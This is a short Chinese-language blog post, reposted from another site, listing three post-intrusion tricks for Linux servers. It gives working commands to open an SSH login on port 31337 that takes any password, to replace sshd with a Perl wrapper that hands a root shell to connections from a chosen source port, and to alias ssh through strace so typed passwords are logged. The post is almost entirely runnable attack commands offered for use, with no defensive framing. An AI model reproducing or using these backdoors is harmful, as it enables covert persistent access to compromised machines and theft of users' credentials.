z0nek

关于我

1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口。
在kali下测试。必须是root权限。
root@kali-vincent:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

ssh root@172.16.100.128 -p 31337
密码随意输入

2、做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接。
在肉鸡上执行:

[root@localhost ~]# cd /usr/sbin

[root@localhost sbin]# mv sshd ../bin

[root@localhost sbin]# echo '#!/usr/bin/perl'>sshd

[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);'>>sshd

[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,'>>sshd

[root@localhost sbin]# chmod u+x sshd

[root@localhost sbin]#/etc/init.d/sshd restart

在本机执行:
socat STDIO TCP4:10.18.180.20:22,sourceport=13377

[root@vincenthostname socat-1.4]# ./socat STDIO TCP4:172.16.100.128:22,sourceport=13377

whoami
root

3. 记录SSH客户端连接密码

[test@CentOS tmp]$ alias ssh='strace -o /tmp/sshpwd.log -e read,write,connect -s2048 ssh'

[test@CentOS tmp]$ grep "read(4"/tmp/sshpwd.logread(4,"y",1)=1read(4,"e",1)=1read(4,"s",1)=1read(4,"\n",1)=1read(4,"h",1)=1read(4,"e",1)=1read(4,"h",1)=1read(4,"e",1)=1read(4,"\n",1)=1read(4,"e",16384)=1read(4,"x",16384)=1read(4,"i",16384)=1read(4,"t",16384)=1read(4,"\r",16384)=1 

文章转自:https://www.91ri.org/9255.html


标签:奇淫技巧

评论
© z0nek | Powered by LOFTER